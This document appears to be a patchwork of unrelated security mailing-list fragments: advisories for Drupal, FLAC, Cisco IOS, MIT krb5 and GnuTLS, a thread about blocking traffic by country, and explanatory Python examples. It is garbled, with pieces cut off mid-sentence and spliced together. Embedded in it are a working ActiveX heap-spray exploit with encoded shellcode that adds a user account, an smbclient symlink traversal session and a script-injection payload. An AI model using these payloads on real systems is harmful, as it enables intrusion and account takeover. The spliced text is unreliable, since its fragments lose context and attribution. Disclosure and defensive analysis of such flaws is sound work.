XSS Vulnerability in Drupal's Node Blocks contributed module (6.x-1.3
and 5.x-1.1)
Discovered by Martin Barbella <martybarbella@gmail.com>
Description of Vulnerability:
-----------------------------
Drupal is a free software package that allows an individual or a
community of users to easily publish, manage and organize a wide
variety of content on a website. (From: http://drupal.org/about)
as early as possible using our registration portal. As this is our
first conference, it would greatly help us in planning and logistics
(such as ordering badges) to have a more accurate idea of expected
attendance, which early registration will definitely help with. To
reward early registration, we have set up a tiered registration pricing
model. Each block of registrations is limited in quantity up to the
final block which is unlimited in quantity and will be available both
via the registration portal and on-site:
Block Price
Block 1 $110.00
Recently, David Litchfield asked me to help him out a bit with a research project he was working on by having me set up a network capture in my DMZ to log SQL Slammer attacks. I don't publish any services here at my Santa Cruz facility (meaning there are no required inbound protocols and no references in DNS anywhere) so I figured it would be nice "quiet" circuit to use for testing. I basically port-forwarded UDP 1434 to a laptop in my DMZ running NetMon3 also filtering for UDP 1434. After about 4 days of running NetMon, I had captured almost 30 (verified) random SQL Slammer attacks. What I found interesting was that every single one of them was sourced in China (all from different addresses).
Now, it's not my intent to start some geopolitical debate here, but I've long heard about how some people would block entire countries at the border in order to obviate issues with malicious traffic. There are obviously some issues with this (both from a technical and potential customer standpoint) so I set out to do a bit of research on my own. First thing I found out was that if one does decide to block entire countries, that it's going to be a bit of work from a rule standpoint. Sure, if I wanted to block all of China I could block APNIC, but that would block WAY more than I would want. So I set about finding a good resource for country-by-country IP ranges. Fortunately, Wade Alcorn, one of my colleagues at NGSSoftware, turned me on to one that seemed pretty decent (there are a few around, though). But finding the resource was just the beginning... The list I got included 234 countries, comprising almost 100,000 records of IP ranges.
Making a firewall rule to block China, for instance, would require entering almost 600 IP ranges - so the "manual" route was clearly out. The thing is, I just didn't want to block countries without more research, so I needed a way to gather some statistics first. Enter ISA Server - as many of you know, I'm a big fan of ISA - it's a true enterprise security product with great scripting capabilities, so I set to work creating an automated method by which to create computer sets in ISA for each country. Basically, I created a SQL database and loaded all the records into it - I then wrote a little COM app to reach out and grab the data by country, create the sets in ISA, and loop through the different ranges of IPs to add them to the set. It worked great.
This accomplished two things - one, I now have full detailed computer sets for each country to do with as I please. Secondly, I have an excellent way of producing detailed reports for traffic analysis in ISA; this was key. With data collection points set up at different places around the world, I was able to capture 3.1 million inbound connection attempts. The results were quite interesting. While China still led with connection attempts overall, it was interesting to see that Canada was a close second. However, while China's traffic consisted of SQL Slammer, HTTP, SMTP, probes for GhostProxy, etc, almost all of Canada's traffic was MESSENGER spam (UDP 1026,1027,1208). The world leader for HTTP was Brazil, strangely enough. Now, all of this will change based on who and where you are, and the types of services being offered. For example, I only got 5 SMTP connection attempts to my cable modem in a week, but my ISP in BM got hundreds of thousands (understandably) in the same time period. I'll whip up some cool reports for what I found and post them once I get some more data in from different collection points, but the valuable outcome of the project was the creation of these individual country-by-country Computer Sets for ISA.
Beforehand, I had no real way of easily and effectively reporting on traffic patterns by source country. Whether you can or can't block entire countries is your business, but at least this affords someone an easy way of doing research. You may not be able to (or even want to) block HTTP from China, but you very well may want to block SMTP - with ISA and computer sets, you can easily do this. Even if you don't block anything at all, you can use the sets to get rich reports of what kind of traffic you are getting from a particular country. While the validity of the practice of blocking entire countries (or particular protocols for that matter) may be up for debate, you now at least have the option to make your own decision based on factual information - to be sure, you've always been able to do this obviously, it's just been my experience that maintaining rule lists by country/protocol has been quite difficult and time consuming.
I've exported every country's entire list to ISA 2006 .XML format, and have posted them on the HoG site for community use. Since I've automated the Set creation process, I'll be updating the sets each month or so to ensure that changes are processed correctly. I would like to thank NGSSoftware for purchasing the required business services to receive the updates - their donation makes it possible for me to give you updated sets for free.
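The per-country, per-protocol tallies the post above attributes to ISA computer sets can be produced from any connection log once the country ranges are indexed. The following Python is an added example, not Thor's COM tool or ISA code: the country table uses documentation prefixes rather than real allocations, the log line format is invented, and the port-to-class mapping follows the traffic categories named in the post. Overlapping ranges are resolved longest-prefix-first, which matters because country lists are frequently nested.

```python
import ipaddress
from collections import Counter

# Constructed country -> range table. These are documentation prefixes,
# not real allocations; a real table has hundreds of ranges per country.
COUNTRY_RANGES = {
    "CN": ["203.0.113.0/24", "198.51.100.0/24"],
    "CA": ["198.51.100.0/25"],   # overlaps the CN /24; more specific wins
    "BR": ["192.0.2.0/24"],
}

# Destination port -> traffic class, following the categories in the post.
PORT_LABELS = {
    1434: "SQL Slammer (UDP 1434)",
    25: "SMTP",
    80: "HTTP",
    1026: "Messenger spam", 1027: "Messenger spam", 1028: "Messenger spam",
}

# Constructed log lines: "<timestamp> <proto> <src_ip> -> <dst_port>"
SAMPLE_LOG = [
    "2008-01-10T03:14:07Z udp 203.0.113.5 -> 1434",
    "2008-01-10T03:15:22Z tcp 203.0.113.9 -> 25",
    "2008-01-10T03:16:01Z udp 198.51.100.20 -> 1026",
    "2008-01-10T03:16:05Z udp 198.51.100.21 -> 1027",
    "2008-01-10T03:17:40Z tcp 192.0.2.77 -> 80",
    "2008-01-10T03:18:12Z tcp 198.51.100.200 -> 25",
    "2008-01-10T03:19:00Z tcp 10.9.8.7 -> 22",
]


def build_index(ranges):
    """Flatten the table into (network, country) pairs, longest prefix first,
    so the most specific entry wins when ranges overlap."""
    pairs = [(ipaddress.ip_network(n), cc)
             for cc, nets in ranges.items() for n in nets]
    return sorted(pairs, key=lambda p: p[0].prefixlen, reverse=True)


def lookup_country(index, addr):
    """Country code for addr, or '??' if no range covers it."""
    ip = ipaddress.ip_address(addr)
    for net, cc in index:
        if ip in net:
            return cc
    return "??"


def parse_line(line):
    _ts, proto, src, _arrow, dport = line.split()
    return proto.upper(), src, int(dport)


def report(lines, index):
    """Count inbound attempts per (country, traffic class)."""
    counts = Counter()
    for line in lines:
        proto, src, dport = parse_line(line)
        label = PORT_LABELS.get(dport, f"{proto} {dport}")
        counts[(lookup_country(index, src), label)] += 1
    return counts


def deny_set(ranges, cc):
    """The ranges a 'deny SMTP from <cc>' style rule would reference."""
    return [str(ipaddress.ip_network(n)) for n in sorted(ranges.get(cc, []))]


if __name__ == "__main__":
    idx = build_index(COUNTRY_RANGES)
    for (cc, label), n in sorted(report(SAMPLE_LOG, idx).items()):
        print(f"{cc}  {label:<24} {n}")
    print("deny SMTP from:", deny_set(COUNTRY_RANGES, "CN"))
```

Run against a real log, the only parts that change are the range table (loaded from whichever country list you trust) and parse_line(); the report is what lets you decide per protocol rather than per country, which is the point the post makes about SMTP from China.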
Technical Details:
The vulnerabilities in the .FLAC format are due to improperly handling
metadata values from malformed files. The file format is available here:
http://flac.sourceforge.net/format.html.
Vulnerability #1: Metadata Block Size Heap Overflow
The first notable vulnerability is the Metadata Block Size Overflow
vulnerability. Editing any Metadata Block Size value to a large value
such as 0xFFFFFF (the maximum of the 24-bit length field) may result in
a heap-based overflow in the decoding software.
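As an added illustration, not code from the advisory or from any FLAC decoder, the following Python walks the METADATA_BLOCK_HEADER chain described at the format URL above. Each header is four bytes: a last-block flag, a 7-bit block type and a 24-bit big-endian length. With strict=False the parser trusts the declared length the way the vulnerable decoders do; with strict=True it refuses a block whose length exceeds the bytes remaining before anything is allocated or copied. The sample streams are constructed inline and consist of the "fLaC" marker plus one STREAMINFO block.

```python
FLAC_MARKER = b"fLaC"
BLOCK_TYPES = {0: "STREAMINFO", 1: "PADDING", 2: "APPLICATION", 3: "SEEKTABLE",
               4: "VORBIS_COMMENT", 5: "CUESHEET", 6: "PICTURE"}


class FlacError(ValueError):
    pass


def parse_block_header(buf, off):
    """METADATA_BLOCK_HEADER: 1 bit last-block flag, 7 bit type, 24 bit length."""
    if off + 4 > len(buf):
        raise FlacError("truncated metadata block header")
    flags = buf[off]
    length = int.from_bytes(buf[off + 1:off + 4], "big")
    return bool(flags & 0x80), flags & 0x7F, length


def read_metadata_blocks(buf, strict=True):
    """Return [(type_name, declared_length, bytes_actually_present), ...].

    strict=False mirrors the vulnerable decoders: the declared length is taken
    as the size of the block, so a C decoder that allocates or copies based on
    it overruns its buffer. strict=True rejects a block whose declared length
    exceeds the bytes left in the file before anything is done with it."""
    if buf[:4] != FLAC_MARKER:
        raise FlacError("not a FLAC stream")
    off, blocks = 4, []
    while True:
        is_last, btype, length = parse_block_header(buf, off)
        data_off = off + 4
        remaining = len(buf) - data_off
        if strict and length > remaining:
            raise FlacError(f"{BLOCK_TYPES.get(btype, btype)} declares {length} "
                            f"bytes, only {remaining} remain")
        payload = buf[data_off:data_off + length]   # silently short when not strict
        blocks.append((BLOCK_TYPES.get(btype, f"RESERVED_{btype}"), length, len(payload)))
        off = data_off + length
        if is_last:
            return blocks


def build_sample(declared_len, actual_len=34, last=True, btype=0):
    """Constructed stream: marker + one STREAMINFO block whose length field
    is set to declared_len while only actual_len payload bytes follow.
    34 is the real STREAMINFO size; to_bytes(3) enforces the 24-bit field."""
    hdr = bytes([(0x80 if last else 0) | btype]) + declared_len.to_bytes(3, "big")
    return FLAC_MARKER + hdr + b"\x00" * actual_len
```

The non-strict walk returns a block that claims 16 MiB but carries 34 bytes; that gap between declared and actual size is exactly what a decoder must check before sizing a heap buffer from the header.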
Whenever vulnerable software opens or processes a malformed FLAC file, it
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
I've used Tim's block sets for a while in my own FOAD rule, but I ended up having to adjust the policy because of the toolsets I provide to the folks that are trying to do a good day's work in those same locations.
Yes; there are plenty of good folks, computers and networks in China and other countries, but the sad fact is these countries also represent the network sources (even if, as has been stated, not the "true" source) of the majority of attacks. My own firewall logs validate this.
How you use the lists Tim provides is a matter of personal choice according to your capabilities and priorities. If your firewall is smart enough to ignore anyone trying to bash your network or play silly buggers in the upper layers, then you may feel that an IP-based block set is overkill. If, like so many, your firewall operates primarily at L4 and below, this data may prove very valuable.
Frankly, I like that someone has taken the time to do the numbers and produce the data; even if I can't use it the way I'd prefer.
Jim
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9' id='IMWebControl' /></object>
<SCRIPT language="javascript">
//add su one, user: sun pass: tzu
// payload as one %u-encoded string
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570");
// 0x90 NOP sled seed, doubled until it is longer than the slack space
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
// fillblock: sled bytes sized to the slack; block: sled sized to one spray allocation minus the slack
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
Devices running affected versions of Cisco IOS Software and Cisco IOS
XE Software are affected when configured to use any of the following
features within Cisco IOS:
* Airline Product Set (ALPS)
* Serial Tunnel Code (STUN) and Block Serial Tunnel Code (BSTUN)
* Native Client Interface Architecture support (NCIA)
* Data-link switching (DLSw)
* Remote Source-Route Bridging (RSRB)
* Point to Point Tunneling Protocol (PPTP)
* X.25 for Record Boundary Preservation (RBP)
exploited remotely and causes corruption of kernel memory, which leads
to a Windows stop error (blue screen) or to arbitrary code execution.
The vulnerability is triggered during processing of a crafted TCP
segment destined to TCP port 139 or 445. These ports are used by the
Microsoft Server Message Block (SMB) protocol.
Cisco has released free software updates that address this
vulnerability.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5580 has
<sarcasm tagfor=oblivious>
Yeh, but what if I want you to justify your decisions in the context of my perceptions?
You don't find it reasonable that because you wish to share your efforts for free that they should serve my needs as well?
</sarcasm>
For the record, I tried Tim's blocklists and because I use an external spam-catcher and therefore accept mail only from them or specific hosts, I can statistically validate the statement that the sources of SMTP connection attempts that ignore my MX record are coming from a large percentage of the IPs Tim assembled, with the majority coming from east Asia (China & Korea being the most active).
It's a fair bet that any SMTP connection attempts that fail to agree with your MX record are "less than trustworthy".
Jim
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* report the failing call with errno text and exit */
static void pexit(const char *msg) { perror(msg); exit(1); }
/* write() may return fewer bytes than requested; loop until all of buf is written */
static void write_loop(int fd, char *buf, int count)
{
    int offset, block;
    offset = 0;
    while (count > 0) {
        block = write(fd, &buf[offset], count);
        if (block < 0) pexit("write");
        offset += block;
        count -= block;
    }
}
traffic, qualifying what is or isn't malicious, and then taking whatever
action you feel is appropriate.
If there is no reason (business, personal, or otherwise) for traffic
from the US or the UK to be reaching your network, then by all means
block all of it if that is what you choose to do. If you re-read my
post, you'll see that the purpose for the sets is for people to make
*educated* decisions regarding what they may choose to block and from
where. In my case (and cases where colleagues tested this) blocking all
SMTP from China resulted in a dramatic (not just "noticeable") reduction
in overall SPAM. In the case of the site that I own (HoG) I decided to
checksum with DES session keys for version 2 (RFC 4121) of the GSS-API
krb5 mechanism.
MIT krb5 (releases krb5-1.7 and newer) incorrectly accepts an unkeyed
checksum for PAC signatures. Running exclusively krb5-1.8 or newer
KDCs blocks the attack.
MIT krb5 KDC (releases krb5-1.7 and newer) incorrectly accepts RFC
3961 key-derivation checksums using RC4 keys when verifying the
req-checksum in a KrbFastArmoredReq.
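An added example, not MIT krb5 code, of the PAC-signature defect the first paragraph describes. The checksum type is carried inside the PAC, so it is chosen by whoever built the PAC; a verifier that recomputes whatever type it finds will accept a signature produced with an unkeyed hash by a party that never had the server key. Checksum type numbers are those from RFC 3961, RFC 3962 and RFC 4757; the keyed checksum is simplified to an HMAC over the raw key (real Kerberos derives a usage-specific key first), and the PAC body and key in the test are constructed.

```python
import hashlib
import hmac

# Checksum type numbers from RFC 3961, RFC 3962 and RFC 4757.
CRC32, RSA_MD5, SHA1_UNKEYED = 1, 7, 14
HMAC_SHA1_96_AES128, HMAC_SHA1_96_AES256, HMAC_MD5_ARCFOUR = 15, 16, -138
KEYED = {HMAC_SHA1_96_AES128, HMAC_SHA1_96_AES256, HMAC_MD5_ARCFOUR}


def checksum(cksumtype, data, key=None):
    """Simplified checksum primitives. Real Kerberos derives a usage-specific
    key before the HMAC; the raw key is used here to keep the example short."""
    if cksumtype == SHA1_UNKEYED:
        return hashlib.sha1(data).digest()
    if cksumtype in (HMAC_SHA1_96_AES128, HMAC_SHA1_96_AES256):
        return hmac.new(key, data, hashlib.sha1).digest()[:12]
    if cksumtype == HMAC_MD5_ARCFOUR:
        return hmac.new(key, data, hashlib.md5).digest()
    raise ValueError(f"checksum type {cksumtype} not supported here")


def verify_pac_signature(pac_body, cksumtype, sig, server_key, require_keyed=True):
    """Verify the server signature over pac_body.

    cksumtype is read from the PAC itself, i.e. it is attacker-controlled.
    require_keyed=False reproduces the defect: whatever type the PAC names is
    recomputed and compared, so an unkeyed hash 'verifies' without the key.
    require_keyed=True only admits types that bind the value to server_key."""
    if require_keyed and cksumtype not in KEYED:
        return False
    key = server_key if cksumtype in KEYED else None
    try:
        expected = checksum(cksumtype, pac_body, key)
    except ValueError:
        return False
    return hmac.compare_digest(expected, sig)


def forge_pac_signature(pac_body):
    """What a client without the server key can produce: an unkeyed type and
    its hash, which the faulty verifier treats as a valid signature."""
    return SHA1_UNKEYED, checksum(SHA1_UNKEYED, pac_body)
```

The same shape of bug is behind the second paragraph: accepting a checksum type the protocol does not permit for the key in hand (an RC4 key with an RFC 3961 key-derivation checksum) lets the sender pick the cheapest verification path instead of the one the KDC intended.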
Inline:
> Subject: Re: All China, All The Time
> The solution of blocking China, however, is one which harms both people
> outside of China, as well as those inside of China. Therefore, it
> translates into an attack on them.
>
> Looking it this operationally:
>
Title: Multiple vulnerabilities in
SUPERAntiSpyware and Super Ad Blocker
Date of Discovery: 2 Feb 2010
Contact Date: 4 Feb 2010
Release Date: 10 Mar 2010
Author: Luka Milkovic
Mail: milkovic.luka at gmail.com
Software Link: SUPERAntiSpyware -
http://www.superantispyware.com/index.html
Super Ad Blocker -
4) of the OSI reference model. Among the services TCP provides are
stream data transfer, reliability, efficient flow control, full-duplex
operation, and multiplexing.
When TCP connections are terminated in Cisco IOS Software, they are
allocated a transmission control block (TCB). All allocated TCBs,
associated TCP port numbers, and the TCP state are displayed in the
output of the "show tcp brief all" command-line interface (CLI) command.
Cisco IOS Software version 15.1(2)T contains a vulnerability that could
cause an embryonic TCP connection to remain in SYNRCVD or SYNSENT
malformed record value. An attacker who successfully exploited this
vulnerability could execute arbitrary code with the privileges of the
user running the MS Word application.
More specifically, a Word file with a specially crafted 'lcbPlcfBkfSdt'
field value (offset '0x4f0') inside the File Information Block (FIB) can
corrupt the heap structure on vulnerable Word versions and enable an
arbitrary free with controlled values.
4. *Vulnerable packages*
* On UNIX systems, run Cascade Server in a chroot environment.
EXPLOIT
=======
This exploit example assumes the ability to create and edit blocks,
stylesheets, and pages. It's also possible to exploit the
vulnerability simply by modifying an existing stylesheet.
Create a stylesheet with the following contents:
/-----------
SilcBool silc_pkcs1_decode(SilcPkcs1BlockType bt,
const unsigned char *data,
SilcUInt32 data_len,
unsigned char *dest_data,
SilcUInt32 dest_data_size,
SilcUInt32 *dest_len)
- Security Research & Defense blog: [4] MS10-045: Microsoft Office
Outlook Remote Code Execution vulnerability
- KB978212 [5] MS10-045: Vulnerability in Microsoft Office Outlook could
allow remote code execution
- KB2271150 [6] You cannot open linked file attachments in Outlook:
"Outlook blocked access to the following potentially unsafe
attachments"
- SSD: [7] SecuriTeam Secure Disclosure program
------------------------------------------------------------------------
Tested version
ArpON (ARP handler inspectiON) is a portable handler daemon that makes ARP secure in order to avoid ARP spoofing/poisoning and similar attacks.
This is possible using two kinds of anti-ARP-poisoning techniques: the first is based on SARPI, or "Static ARP Inspection", the second on the DARPI, or "Dynamic ARP Inspection", approach.
Features:
- It replaces Arpwatch & co.;
- It detects and blocks ARP poisoning/spoofing attacks in statically configured networks;
- It detects and blocks ARP poisoning/spoofing attacks in dynamically configured (DHCP) networks;
- It detects and blocks unidirectional and bidirectional attacks;
- It manages the network interface across unplug, boot, hibernation and suspend OS events;
- Easily configurable via command line switches, provided that you have root permissions;
"Like all security mitigation and protection technologies, the XSS Filter's
approach does have limitations, being that it is a pragmatic balance
between application compatibility, security, and performance.
Some examples:
* Injection into some contexts is not blocked. Ex: Scenarios where content
can be injected directly into JavaScript without breaking out of a string.
* Injections facilitated by some HTTP headers are not currently blocked.
Ex: "Referer" based injection.
left" style="width: 500px; border: 1px solid rgb(177, 192,
240);"><input type="hidden" value="pserver"
name="frm_o_o[0][class]"/>
<input type="hidden" value="localhost" name="frm_o_o[0][nname]"/>
<div align="left" style="padding: 10px; background-color: rgb(250,
248, 248); display: block;"> Command <br/>
... or
<input width="60%" type="text" value="
name="frm_pserver_c_ccenter_command"
class="frm_pserver_c_ccenter_command textbox"/>
<iframe size="30" <"=" [PERSISTENT SCRIPT CODE INJECT!]" src="a">
of available packet buffers may decrease when a security appliance
receives IPv6 traffic and is not configured for IPv6 operation. IPv6
transit traffic does not cause a problem.
Administrators can check packet buffer utilization by issuing the
command "show blocks" and inspecting the output for the number of
available 1,550-byte blocks. If the number of blocks is zero (indicated
by 0 in the CNT column), then the security appliance may be experiencing
this issue. For example:
ciscoasa# show blocks
companies).
Another possible attack is to find a web proxy on the internet that
allows SSL connections (there are several of them findable via Google). This way,
the attacker accesses the normal sites (port 80) through this web
proxy, and the web proxy through Squid.
McAfee Web Gateway blocks several of these web proxies in its regular
configuration, but the appliance is still vulnerable to the attacks
mentioned.
One radical mitigation is to block any connection made to a bare IP
address, forcing users to use DNS hostnames. I do not know whether it is
practical, but it would stop the attack.
- Contact : Guns[at]0x90[dot]com[dot]ar
-
- Problem : Cross Site Request Forgery Vulnerability
-
- Summary : sBlog has, by default, no CSRF protection. This may allow an attacker
to change any block by tricking a victim with admin privileges
into visiting a specially forged web page (even on a totally different server)
that sends a request to change one block on the site. The
victim does not know that the form was sent. If the victim has admin
privileges the exploit will succeed, otherwise nothing will happen.
-
Analysis:
Details for TLS record handling vulnerability in GnuTLS [MU-201202-01]:
The block cipher decryption logic in GnuTLS assumed that a record containing
any data which was a multiple of the block size was valid for further
decryption processing, leading to a heap corruption vulnerability.
The bug can be reproduced in GnuTLS 3.0.14 by creating a corrupt
GenericBlockCipher struct with a valid IV, while everything else is stripped
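An added example, not GnuTLS code, of the length checks a CBC record must pass before its padding byte is read. It assumes the TLS 1.1+ GenericBlockCipher layout (explicit IV || content || MAC || padding || padding_length), a 16-byte block (AES-CBC) and a 20-byte MAC (HMAC-SHA1). The cipher step is omitted because only the length arithmetic matters: content_length() shows the subtraction going negative for a record that is an IV and nothing else, which in a C implementation wraps to a huge unsigned size, and unwrap_block_record() rejects such a record before it is unpadded. The records in the test are constructed.

```python
class RecordError(ValueError):
    pass


def content_length(body_len, mac_len, pad_len):
    """Signed content length implied by a record body of body_len bytes (IV
    already removed) whose last byte claims pad_len padding bytes. Negative
    means the MAC and padding claim more bytes than the record holds; C code
    doing this in size_t arithmetic gets a huge value instead of a sign."""
    return body_len - mac_len - pad_len - 1


def unwrap_block_record(record, block_size, mac_len):
    """record = IV || decrypted(content || MAC || padding || padding_length).
    Returns (content, mac) or raises RecordError."""
    if len(record) % block_size != 0:
        raise RecordError("ciphertext length is not a multiple of the block size")
    body = record[block_size:]                      # drop the explicit IV
    # A multiple-of-block-size length says nothing about whether a MAC and at
    # least one padding byte are present; check before reading body[-1].
    if len(body) < mac_len + 1:
        raise RecordError("record too short for a MAC and a padding length byte")
    pad_len = body[-1]
    clen = content_length(len(body), mac_len, pad_len)
    if clen < 0:
        raise RecordError("padding length exceeds the record")
    if any(b != pad_len for b in body[clen + mac_len:-1]):
        raise RecordError("inconsistent padding bytes")
    return body[:clen], body[clen:clen + mac_len]


def build_record(content, mac, block_size=16, iv=b"\x00" * 16):
    """Construct a well-formed record body (already 'decrypted') for testing:
    pad so that content + MAC + padding + length byte fills whole blocks."""
    pad_len = (block_size - (len(content) + len(mac) + 1) % block_size) % block_size
    return iv + content + mac + bytes([pad_len]) * (pad_len + 1)
```

The order of the checks is the point: the multiple-of-block-size test is necessary but the minimum-length test must come before any byte of the body is interpreted, and the padding-length test must come before the MAC offset is computed.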
On Mon, Jan 14, 2008 at 02:20:50PM -0800, Thor (Hammer of God) wrote:
[...]
> First thing I found out was that if one does decide to block
> entire countries, that it's going to be a bit of work from a rule
> standpoint.
Not at all, if you have the ability to integrate DNS lookups into
your filtering process (coupled with a DNS cache running locally on
the firewall, this should not be particularly demanding on your
resources). This problem has already been solved by people wanting
functionality, both filtering and reporting, directly on the box, and is
far more efficient in my opinion... But, it's a great point and I'm glad
you shared that.
>
> > Sure, if I wanted to block all of China I could block APNIC, but
> > that would block WAY more than I would want.
> [...]
>
> In my professional life, I see frequent requests of this nature from
> customers in western/English-speaking countries. My immediate
* PowerPoint XP SP3
PowerPoint 2003 SP2 and SP3 contain the vulnerable code, but by default
are unable to open PowerPoint 4.2 formatted files. This is due to the
Office 2003 SP2/SP3 File Block Policy, which limits the file formats
that Office applications will open without special permissions. If the
targeted user has disabled the File Block Policy settings in PowerPoint
2003 SP3, then they are vulnerable. However, this is a non-default
configuration. More on this policy can be found at the following URL.